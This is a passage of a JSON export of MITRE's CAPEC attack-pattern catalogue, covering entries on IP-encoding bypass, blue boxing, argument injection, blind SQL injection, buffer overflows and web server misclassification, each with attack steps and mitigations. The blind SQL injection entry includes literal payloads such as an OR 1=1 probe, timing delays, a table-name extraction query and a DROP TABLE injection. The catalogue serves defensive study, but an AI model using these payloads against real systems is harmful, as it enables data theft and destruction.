variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Prerequisites":{"Prerequisite":["The target software must fail to anticipate all of the possible valid encodings of an IP/web address.","The adversary must have the ability to communicate with the server."]},"Skills_Required":{"Skill":["The adversary has only to try IP address format combinations.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Design: Default deny access control policies","Design: Input validation routines should check and enforce both input data types and content against a positive specification. In regards to IP addresses, this should include the authorized manner for the application to represent IP addresses and not accept user specified IP addresses and IP address formats (such as ranges)","Implementation: Perform input validation for all remote content."]},"Example_Instances":{"Example":"An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"291"},{"CWE_ID":"173"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"5":{"ID":"5","Name":"Blue Boxing","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"220"}},"Prerequisites":{"Prerequisite":"System must use weak authentication mechanisms for administrative functions."},"Skills_Required":{"Skill":["Given a vulnerable phone system, the attackers\' technical vector relies on attacks that are well documented in cracker \'zines and have been around for decades.",{"Level":"Low"}]},"Resources_Required":{"Resource":"CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch"},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Implementation: Upgrade phone lines. Note this may be prohibitively expensive","Use strong access control such as two factor access control for administrative access to the switch"]},"Example_Instances":{"Example":"An adversary identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the adversary has gained control of the switch launching calls, routing calls, and a whole host of opportunities are available."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"285"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"6":{"ID":"6","Name":"Argument Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Discovery of potential injection vectors] Using an automated tool or manual discovery, the attacker identifies services or methods with arguments that could potentially be used as injection vectors (OS, API, SQL procedures, etc.).","Technique":["Manually cover the application and record the possible places where arguments could be passed into external systems.","Use a spider, for web applications, to create a list of URLs and associated inputs."]},{"Step":"2","Phase":"Experiment","Description":"[1. Attempt variations on argument content] Possibly using an automated tool, the attacker will perform injection variations of the arguments.","Technique":["Use a very large list of probe strings in order to detect if there is a positive result, and, what type of system has been targeted (if obscure).","Use a proxy tool to record results, error messages and/or log if accessible."]},{"Step":"3","Phase":"Exploit","Description":"[Abuse of the application] The attacker injects specific syntax into a particular argument in order to generate a specific malicious effect in the targeted application.","Technique":"Manually inject specific payload into targeted argument."}]},"Prerequisites":{"Prerequisite":["Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions.","Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client."]},"Skills_Required":{"Skill":["The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.","Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.","Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise."]},"Example_Instances":{"Example":"A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [REF-482]"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"146"},{"CWE_ID":"184"},{"CWE_ID":"78"},{"CWE_ID":"185"},{"CWE_ID":"697"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-482"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"7":{"ID":"7","Name":"Blind SQL Injection","Abstraction":"Detailed","Status":"Draft","Description":"Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"66"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":["[Hypothesize SQL queries in application]",{"p":["Generated hypotheses regarding the SQL queries in an application. For example, the adversary may hypothesize that their input is passed directly into a query that looks like:","Of course, there are many other possibilities."],"div":["\\"SELECT * FROM orders WHERE ordernum = _____\\"",{"style":"margin-left:10px;","class":"informative"}]}],"Technique":"Research types of SQL queries and determine which ones could be used at various places in an application."},{"Step":"2","Phase":"Explore","Description":["[Determine how to inject information into the queries]",{"p":"Determine how to inject information into the queries from the previous step such that the injection does not impact their logic. For example, the following are possible injections for those queries:","div":["\\"5\' OR 1=1; --\\"",{"style":"margin-left:10px;","class":"informative"}]}],"Technique":["Add clauses to the SQL queries such that the query logic does not change.","Add delays to the SQL queries in case server does not provide clear error messages (e.g. WAITFOR DELAY \'0:0:10\' in SQL Server or BENCHMARK(1000000000,MD5(1) in MySQL). If these can be injected into the queries, then the length of time that the server takes to respond reveals whether the query is injectable or not."]},{"Step":"3","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to injection] Determine the user-controllable input susceptible to injection. For each user-controllable input that the adversary suspects is vulnerable to SQL injection, attempt to inject the values determined in the previous step. If an error does not occur, then the adversary knows that the SQL injection was successful.","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.","Use network-level packet injection tools such as netcat to inject input","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"4","Phase":"Experiment","Description":"[Determine database type] Determines the type of the database, such as MS SQL Server or Oracle or MySQL, using logical conditions as part of the injected queries","Technique":["Try injecting a string containing char(0x31)=char(0x31) (this evaluates to 1=1 in SQL Server only)","Try injecting a string containing 0x313D31 (this evaluates to 1=1 in MySQL only)","Inject other database-specific commands into input fields susceptible to SQL Injection. The adversary can determine the type of database that is running by checking whether the query executed successfully or not (i.e. whether the adversary received a normal response from the server or not)."]},{"Step":"5","Phase":"Exploit","Description":"[Extract information about database schema] Extract information about database schema by getting the database to answer yes/no questions about the schema.","Technique":["Automatically extract database schema using a tool such as Absinthe.","Manually perform the blind SQL Injection to extract desired information about the database schema."]},{"Step":"6","Phase":"Exploit","Description":"[Exploit SQL Injection vulnerability] Use the information obtained in the previous steps to successfully inject the database in order to bypass checks or modify, add, retrieve or delete data from the database","Technique":"Use information about how to inject commands into SQL queries as well as information about the database schema to execute attacks such as dropping tables, inserting records, etc."}]},"Prerequisites":{"Prerequisite":["SQL queries used by the application to store, retrieve or modify data.","User-controllable input that is not properly validated by the application as part of SQL queries."]},"Skills_Required":{"Skill":["Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":"The only indicators of successful Blind SQL Injection are the application or database logs that show similar queries with slightly differing logical conditions that increase in complexity over time. However, this requires extensive logging as well as knowledge of the queries that can be used to perform such injection and return meaningful information from the database."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.","Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(\') or SQL-comments (--) based on the context in which they appear."]},"Example_Instances":{"Example":[{"p":["An adversary may try entering something like \\"username\' AND 1=1; --\\" in an input field. If the result is the same as when the adversary entered \\"username\\" in the field, then the adversary knows that the application is vulnerable to SQL Injection. The adversary can then ask yes/no questions from the database server to extract information from it. For example, the adversary can extract table names from a database using the following types of queries:","If the above query executes properly, then the adversary knows that the first character in a table name in the database is a letter between m and z. If it doesn\'t, then the adversary knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the adversary can determine all table names in the database. Subsequently, the adversary may execute an actual attack and send something like:"],"div":["\\"username\' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) > 108\\".",{"style":"margin-left:10px;","class":"informative"},"\\"username\'; DROP TABLE trades; --",{"style":"margin-left:10px;","class":"informative"}]},"In the PHP application TimeSheet 1.1, an adversary can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the adversary is aware of the local path structure, the adversary can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST[\'username\'] variable in the login.php file. See also: CVE-2006-4705"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"89"},{"CWE_ID":"209"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Blind SQL Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"8":{"ID":"8","Name":"Buffer Overflow in an API Call","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An adversary who has knowledge of known vulnerable libraries or shared code can easily target software that makes use of these libraries. All clients that make use of the code library thus become vulnerable by association. This has a very broad effect on security across a system, usually affecting more than one software process.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary, with knowledge of vulnerable libraries or shared code modules, identifies a target application or program that makes use of these."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary attempts to use the API, and if they can they send a large amount of data to see if the buffer overflow attack really does work.","Technique":"Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected based on their knowledge of the vulnerability and their desired outcome. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries\' choosing which points to code injected by the adversary.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the API as the injection vector, the adversary injects the crafted overflow content into the buffer."}]},"Prerequisites":{"Prerequisite":["The target host exposes an API to the user.","One or more API functions exposed by the target host has a buffer overflow vulnerability."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use a language or compiler that performs automatic bounds checking.","Use secure functions not vulnerable to buffer overflow.","If you have to use dangerous functions, make sure that you do boundary checking.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Use OS-level preventative functionality. Not a complete solution."]},"Example_Instances":{"Example":[{"div":["Attack Example: Libc in FreeBSD",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in the FreeBSD utility setlocale (found in the libc module) puts many programs at risk all at once."},{"div":["Xtlib",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"118"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"9":{"ID":"9","Name":"Buffer Overflow in Local Command-Line Utilities","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets command-line utilities available in a number of shells. An attacker can leverage a vulnerability found in a command-line utility to escalate privilege to root.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target system] The adversary first finds a target system that they want to gain elevated priveleges on. This could be a system they already have some level of access to or a system that they will gain unauthorized access at a lower privelege using some other means."},{"Step":"2","Phase":"Explore","Description":"[Find injection vector] The adversary identifies command line utilities exposed by the target host that contain buffer overflow vulnerabilites. The adversary likely knows which utilities have these vulnerabilities and what the effected versions are, so they will also obtain version numbers for these utilities."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow command] Once the adversary has found a vulnerable utility, they will use their knownledge of the vulnerabilty to create the command that will exploit the buffer overflow."},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary executes the crafted command, gaining elevated priveleges on the machine."}]},"Prerequisites":{"Prerequisite":["The target host exposes a command-line utility to the user.","The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Carefully review the service\'s implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow.","Use a language or compiler that performs automatic bounds checking.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Operational: Use OS-level preventative functionality. Not a complete solution.","Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.","Do not unnecessarily expose services."]},"Example_Instances":{"Example":{"div":[{"style":"margin-left:10px;","div":["Attack Example: HPUX passwd",{"style":"color:#32498D; font-weight:bold;"},"A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option."]},{"style":"margin-left:10px;","div":["Attack Example: Solaris getopt",{"style":"color:#32498D; font-weight:bold;"},"A buffer overflow in Solaris\'s getopt command (found in libc) allows local users to gain root privileges via a long argv[0]."]}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"10":{"ID":"10","Name":"Buffer Overflow via Environment Variables","Abstraction":"Detailed","Status":"Draft","Description":"This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.","Extended_Description":"Although the focus of this attack is putting excessive content into an environment variable that is loaded into a buffer, environment variables can be used to assist a classic buffer overflow attack as well. In the case where the buffer used in a traditional buffer overflow attack is not large enough to store the adversary\'s shell code, they will store the shell code in an environment variable and attempt to return to its address, rather than back into the data they wrote to the buffer.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. In this attack the adversary looks for an application that loads the content of an environment variable into a buffer."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"Change the values of environment variables thought to be used by the application to contain excessive data. If the program is loading the value of the environment variable into a buffer, this could cause a crash and an attack vector will be found."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary injects the crafted overflow content into the buffer."}]},"Prerequisites":{"Prerequisite":["The application uses environment variables.","An environment variable exposed to the user is vulnerable to a buffer overflow.","The vulnerable environment variable uses untrusted data.","Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer."]},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":"If the application does bound checking, it should fail when the data source is larger than the size of the destination buffer. If the application\'s code is well written, that failure should trigger an alert."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Do not expose environment variable to the user.","Do not use untrusted data in your environment variables.","Use a language or compiler that performs automatic bounds checking","There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow."]},"Example_Instances":{"Example":[{"div":["Attack Example: Buffer Overflow in $HOME",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable."},{"div":["Attack Example: Buffer Overflow in TERM",{"style":"color:#32498D; font-weight:bold;"}],"p":"A buffer overflow in the rlogin program involves its consumption of the TERM environmental variable."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"302"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"99"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Buffer Overflow via Environment Variables"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-2"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow, Extended_Description"}]}},"11":{"ID":"11","Name":"Cause Web Server Misclassification","Abstraction":"Detailed","Status":"Draft","Description":"An attack of this type exploits a Web server\'s decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process. This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker\'s job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"635"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Footprint file input vectors] Manually or using an automated tool, an attacker searches for all input locations where a user has control over the filenames or MIME types of files submitted to the web server.","Technique":["Attacker manually crawls application to identify file inputs","Attacker uses an automated tool to crawl application identify file inputs","Attacker manually assesses strength of access control protecting native application files from user control","Attacker explores potential for submitting files directly to the web server via independently constructed HTTP Requests"]},{"Step":"2","Phase":"Experiment","Description":"[File misclassification shotgunning] An attacker makes changes to file extensions and MIME types typically processed by web servers and looks for abnormal behavior.","Technique":["Attacker submits files with switched extensions (e.g. .php on a .jsp file) to web server.","Attacker adds extra characters (e.g. adding an extra . after the file extension) to filenames of files submitted to web server."]},{"Step":"3","Phase":"Experiment","Description":"[File misclassification sniping] Understanding how certain file types are processed by web servers, an attacker crafts varying file payloads and modifies their file extension or MIME type to be that of the targeted type to see if the web server is vulnerable to misclassification of that type.","Technique":["Craft a malicious file payload, modify file extension to the targeted file type and submit it to the web server.","Craft a malicious file payload, modify its associated MIME type to the targeted file type and submit it to the web server."]},{"Step":"4","Phase":"Exploit","Description":"[Disclose information] The attacker, by manipulating a file extension or MIME type is able to make the web server return raw information (not executed).","Technique":["Manipulate the file names that are explicitly sent to the server.","Manipulate the MIME sent in order to confuse the web server."]}]},"Prerequisites":{"Prerequisite":["Web server software must rely on file name or file extension for processing.","The attacker must be able to make HTTP requests to the web server."]},"Skills_Required":{"Skill":["To modify file name or file extension",{"Level":"Low"},"To use misclassification to force the Web server to disclose 